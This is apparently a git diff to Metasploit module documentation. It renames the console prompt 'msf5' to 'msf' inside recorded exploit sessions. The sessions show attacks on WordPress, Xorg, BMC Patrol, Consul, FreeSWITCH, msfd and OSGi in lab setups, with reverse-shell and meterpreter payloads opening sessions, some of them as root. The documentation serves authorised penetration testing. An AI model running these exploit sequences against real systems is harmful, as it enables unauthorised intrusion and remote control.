@@ -23,18 +23,18 @@ ### Test on Windows 7 x86 running WordPress v4.9.7 ``` - msf5 > use exploit/multi/http/wp_responsive_thumbnail_slider_upload - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165 + msf > use exploit/multi/http/wp_responsive_thumbnail_slider_upload + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set rhosts 192.168.37.165 rhosts => 192.168.37.165 - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set targeturi wordpress targeturi => wordpress - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set username test username => test - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > set password password password => password - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > check [*] 192.168.37.165:80 The target service is running, but could not be validated. - msf5 exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run + msf exploit(multi/http/wp_responsive_thumbnail_slider_upload) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] WordPress accessed diff --git a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md index d66fb2ccb0..ae65e89cbf 100644 --- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md +++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md 
@@ -56,14 +56,14 @@ Will check for console lock under linux (default: `true`) ### OpenBSD ``` -msf5 > use exploit/multi/local/xorg_x11_suid_server -msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +msf > use exploit/multi/local/xorg_x11_suid_server +msf exploit(multi/local/xorg_x11_suid_server) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2 +msf exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2 lhost => 172.30.0.2 -msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true +msf exploit(multi/local/xorg_x11_suid_server) > set verbose true verbose => true -msf5 exploit(multi/local/xorg_x11_suid_server) > run +msf exploit(multi/local/xorg_x11_suid_server) > run [!] SESSION may not be compatible with this module. [*] Started reverse double SSL handler on 172.30.0.2:4444 @@ -100,14 +100,14 @@ uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), ### CentOS 7.4.1708 x86_64 ``` -msf5 > use exploit/multi/local/xorg_x11_suid_server -msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +msf > use exploit/multi/local/xorg_x11_suid_server +msf exploit(multi/local/xorg_x11_suid_server) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 +msf exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true +msf exploit(multi/local/xorg_x11_suid_server) > set verbose true verbose => true -msf5 exploit(multi/local/xorg_x11_suid_server) > run +msf exploit(multi/local/xorg_x11_suid_server) > run [*] Started reverse double SSL handler on 172.16.191.188:4444 [*] Running additional check for Linux 
@@ -147,14 +147,14 @@ Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 ### Red Hat Enterprise Linux 7.5 x86_64 ``` -msf5 > use exploit/multi/local/xorg_x11_suid_server -msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 +msf > use exploit/multi/local/xorg_x11_suid_server +msf exploit(multi/local/xorg_x11_suid_server) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 +msf exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true +msf exploit(multi/local/xorg_x11_suid_server) > set verbose true verbose => true -msf5 exploit(multi/local/xorg_x11_suid_server) > run +msf exploit(multi/local/xorg_x11_suid_server) > run [*] Started reverse double SSL handler on 172.16.191.165:4444 [*] Running additional check for Linux diff --git a/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md b/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md index ac8ebccb2d..e78f54fd80 100644 --- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md +++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md @@ -40,7 +40,7 @@ Xorg shared object name for modulepath (default: `libglx.so`) ### Xorg `v1.19.3` on Centos 7.4 ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] Sending stage (816260 bytes) to 172.16.215.159 
@@ -56,16 +56,16 @@ BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1 +msf exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1 session => 1 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 lhost => 172.16.215.1 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > check [+] The target is vulnerable. -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [+] Passed all initial checks for exploit @@ -90,7 +90,7 @@ Meterpreter : x64/linux ### Xorg `v1.19.5` on Solaris 11.4 ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.215.1:4444 [*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:49722) at 2019-10-22 09:27:45 -0500 
@@ -103,20 +103,20 @@ background Background session 3? [y/N] y -msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh +msf exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh payload => cmd/unix/reverse_ksh -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1 lhost => 172.16.215.1 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3 session => 3 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2 +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2 target => 2 -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > check [!] SESSION may not be compatible with this module. [+] The target is vulnerable. -msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.16.215.1:4444 diff --git a/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md b/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md index f6f2ebd819..bd6e7da38b 100644 --- a/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md +++ b/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md 
@@ -27,20 +27,20 @@ The exploit module contains several targets as detailed below. ### Target 0: Windows Powershell Injected Shellcode This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). - msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 + msf > use exploit/multi/misc/bmc_patrol_cmd_exec + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 RHOSTS => 192.168.162.133 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 LHOST => 192.168.162.128 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user USER => user - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password PASSWORD => password - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j + msf exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j [*] Exploit running as background job 0. - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > + msf exploit(multi/misc/bmc_patrol_cmd_exec) > [*] Started reverse TCP handler on 192.168.162.128:4444 [*] 192.168.162.133:3181 - Connected to BMC Patrol Agent. [*] 192.168.162.133:3181 - Successfully authenticated user. 
@@ -51,22 +51,22 @@ This module target provides support for command staging to enable arbitrary Meta ### Target 1: Generic Cmd This target can be used with *cmd* payloads to execute operating system commands against the target host. - msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130 + msf > use exploit/multi/misc/bmc_patrol_cmd_exec + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130 RHOSTS => 192.168.162.130 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 LHOST => 192.168.162.128 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol USER => patrol - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password PASSWORD => password - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1 + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1 TARGET => 1 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat PAYLOAD => cmd/unix/reverse_netcat - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j + msf exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j [*] Exploit running as background job 0. - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > + msf exploit(multi/misc/bmc_patrol_cmd_exec) > [*] Started reverse TCP handler on 192.168.162.128:4444 [*] 192.168.162.130:3181 - Connected to BMC Patrol Agent. [*] 192.168.162.130:3181 - Successfully authenticated user. 
@@ -76,15 +76,15 @@ This target can be used with *cmd* payloads to execute operating system commands ### Target Cmd Execution: Windows/Unix/Linux This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0. - msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 + msf > use exploit/multi/misc/bmc_patrol_cmd_exec + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 RHOSTS => 192.168.162.133 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user USER => user - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password PASSWORD => password - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami + msf exploit(multi/misc/bmc_patrol_cmd_exec) > exploit [*] 192.168.162.133:3181 - Connected to BMC Patrol Agent. [*] 192.168.162.133:3181 - Successfully authenticated user. [*] 192.168.162.133:3181 - Command to execute: whoami diff --git a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md index 37ee541574..41005d6810 100644 --- a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md +++ b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md 
@@ -31,14 +31,14 @@ can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and e ### Remote target ``` - msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1 + msf > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1 rhost => 127.0.0.1 - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1 + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1 lhost => 127.0.0.1 - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234 + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234 lport => 1234 - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit [*] Started reverse TCP handler on 127.0.0.1:1234 [*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000 diff --git a/documentation/modules/exploit/multi/misc/consul_rexec_exec.md b/documentation/modules/exploit/multi/misc/consul_rexec_exec.md index d5e144ff4d..800db3c0f4 100644 --- a/documentation/modules/exploit/multi/misc/consul_rexec_exec.md +++ b/documentation/modules/exploit/multi/misc/consul_rexec_exec.md 
@@ -67,16 +67,16 @@ You can verify the module against the vulnerable application with those steps: Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target: ``` -msf5 > use exploit/multi/misc/consul_rexec_exec -msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4 +msf > use exploit/multi/misc/consul_rexec_exec +msf exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4 RHOSTS => 172.17.0.4 -msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1 +msf exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1 LHOST => 172.17.42.1 -msf5 exploit(multi/misc/consul_rexec_exec) > check +msf exploit(multi/misc/consul_rexec_exec) > check [+] 172.17.0.4:8500 The target is vulnerable. -msf5 exploit(multi/misc/consul_rexec_exec) > run +msf exploit(multi/misc/consul_rexec_exec) > run [*] Started reverse TCP handler on 172.17.42.1:4444 [*] Creating session. diff --git a/documentation/modules/exploit/multi/misc/consul_service_exec.md b/documentation/modules/exploit/multi/misc/consul_service_exec.md index 943230dbb5..5759dc6b87 100644 --- a/documentation/modules/exploit/multi/misc/consul_service_exec.md +++ b/documentation/modules/exploit/multi/misc/consul_service_exec.md 
@@ -64,16 +64,16 @@ You can verify the module against the vulnerable application with those steps: Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target: ``` -msf5 > use exploit/multi/misc/consul_service_exec -msf5 exploit(multi/misc/consul_service_exec) > set RHOSTS 172.17.0.4 +msf > use exploit/multi/misc/consul_service_exec +msf exploit(multi/misc/consul_service_exec) > set RHOSTS 172.17.0.4 RHOSTS => 172.17.0.4 -msf5 exploit(multi/misc/consul_service_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/misc/consul_service_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/misc/consul_service_exec) > set LHOST 172.17.42.1 +msf exploit(multi/misc/consul_service_exec) > set LHOST 172.17.42.1 LHOST => 172.17.42.1 -msf5 exploit(multi/misc/consul_service_exec) > check +msf exploit(multi/misc/consul_service_exec) > check [+] 172.17.0.4:8500 The target is vulnerable. -msf5 exploit(multi/misc/consul_rexec_exec) > run +msf exploit(multi/misc/consul_rexec_exec) > run [*] Started reverse TCP handler on 172.17.42.1:4444 [*] Creating service 'BBBDX' diff --git a/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md b/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md index a4cc76a865..39660e716f 100644 --- a/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md +++ b/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md 
@@ -55,15 +55,15 @@ ### Windows PowerShell Target ``` -msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" +msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" [*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.242) [*] Local TCP relay created: :1234 <-> 127.0.0.1:8021 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 rport => 1234 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets Exploit targets: @@ -76,11 +76,11 @@ Exploit targets: 4 Windows (Dropper) -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2 target => 2 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] 127.0.0.1:1234 - Login success 
@@ -107,15 +107,15 @@ meterpreter > ### Linux Dropper Target ``` -msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" +msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" [*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.172) [*] Local TCP relay created: :1234 <-> 127.0.0.1:8021 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 rport => 1234 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets Exploit targets: @@ -128,13 +128,13 @@ Exploit targets: 4 Windows (Dropper) -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 1 target => 1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmdstager::flavor wget +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmdstager::flavor wget cmdstager::flavor => wget -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] 127.0.0.1:1234 - Login success 
@@ -165,15 +165,15 @@ meterpreter > ### UNIX Generic Command Target ``` -msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" +msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" [*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.172) [*] Local TCP relay created: :1234 <-> 127.0.0.1:8021 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 rport => 1234 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets Exploit targets: 
@@ -186,15 +186,15 @@ Exploit targets: 4 Windows (Dropper) -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 0 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 0 target => 0 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set payload cmd/unix/generic +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set payload cmd/unix/generic payload => cmd/unix/generic -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmd "id; uname -a" +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmd "id; uname -a" cmd => id; uname -a -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set verbose true +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set verbose true verbose => true -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run [*] 127.0.0.1:1234 - Login success [*] 127.0.0.1:1234 - Sending payload (12 bytes) ... @@ -205,5 +205,5 @@ uid=999(freeswitch) gid=999(freeswitch) groups=999(freeswitch) Linux freeswitch-vm 3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u1 (2016-09-03) x86_64 GNU/Linux [*] Exploit completed, but no session was created. -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > ``` diff --git a/documentation/modules/exploit/multi/misc/msfd_rce_remote.md b/documentation/modules/exploit/multi/misc/msfd_rce_remote.md index a2a2c29292..9811cfafe3 100644 --- a/documentation/modules/exploit/multi/misc/msfd_rce_remote.md +++ b/documentation/modules/exploit/multi/misc/msfd_rce_remote.md 
@@ -51,16 +51,16 @@ Source code and installers: ### Remote target ``` - msf5 > use exploit/multi/misc/msfd_rce_remote - msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101 + msf > use exploit/multi/misc/msfd_rce_remote + msf exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101 rhost => 192.168.56.101 - msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp + msf exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp payload => ruby/shell_reverse_tcp - msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17 + msf exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17 lhost => 192.168.0.17 - msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443 + msf exploit(multi/misc/msfd_rce_remote) > set lport 443 lport => 443 - msf5 exploit(multi/misc/msfd_rce_remote) > exploit + msf exploit(multi/misc/msfd_rce_remote) > exploit [-] Handler failed to bind to 192.168.0.17:443:- - [*] Started reverse TCP handler on 0.0.0.0:443 @@ -91,10 +91,10 @@ Source code and installers: [*] Local TCP relay created: :55554 <-> 127.0.0.1:55554 meterpreter > background [*] Backgrounding session 2... - msf5 > use exploit/multi/misc/msfd_rce_remote - msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1 + msf > use exploit/multi/misc/msfd_rce_remote + msf exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1 rhost => 127.0.0.1 - msf5 exploit(multi/misc/msfd_rce_remote) > exploit + msf exploit(multi/misc/msfd_rce_remote) > exploit [-] Handler failed to bind to 192.168.0.17:443:- - [*] Started reverse TCP handler on 0.0.0.0:443 diff --git a/documentation/modules/exploit/multi/misc/osgi_console_exec.md b/documentation/modules/exploit/multi/misc/osgi_console_exec.md index cffb4c097d..810ae05519 100644 --- a/documentation/modules/exploit/multi/misc/osgi_console_exec.md +++ b/documentation/modules/exploit/multi/misc/osgi_console_exec.md 
@@ -92,14 +92,14 @@ You can verify the module against the vulnerable application with those steps: Exploit running against a Ubuntu Linux target: ``` -msf5 > use exploit/multi/misc/osgi_console_exec -msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4 -msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555 -msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 0 -msf5 exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 -msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444 -msf5 exploit(multi/misc/osgi_console_exec) > run +msf > use exploit/multi/misc/osgi_console_exec +msf exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4 +msf exploit(multi/misc/osgi_console_exec) > set RPORT 5555 +msf exploit(multi/misc/osgi_console_exec) > set TARGET 0 +msf exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 +msf exploit(multi/misc/osgi_console_exec) > set LPORT 4444 +msf exploit(multi/misc/osgi_console_exec) > run [*] Exploit running as background job 1. [*] Started reverse TCP handler on 172.20.10.2:4444 [*] 172.20.10.4:5555 - Accessing the OSGi console ... @@ -109,7 +109,7 @@ msf5 exploit(multi/misc/osgi_console_exec) > run [*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.4:39314) at 2018-02-14 19:17:39 +0100 [*] 172.20.10.4:5555 - Command Stager progress - 100.00% done (763/763 bytes) -msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 2 +msf exploit(multi/misc/osgi_console_exec) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer : 172.20.10.4 
@@ -125,14 +125,14 @@ Meterpreter : x86/linux Exploit running against a Windows 7 target: ``` -msf5 > use exploit/multi/misc/osgi_console_exec -msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3 -msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555 -msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 1 -msf5 exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp -msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 -msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444 -msf5 exploit(multi/misc/osgi_console_exec) > run +msf > use exploit/multi/misc/osgi_console_exec +msf exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3 +msf exploit(multi/misc/osgi_console_exec) > set RPORT 5555 +msf exploit(multi/misc/osgi_console_exec) > set TARGET 1 +msf exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp +msf exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 +msf exploit(multi/misc/osgi_console_exec) > set LPORT 4444 +msf 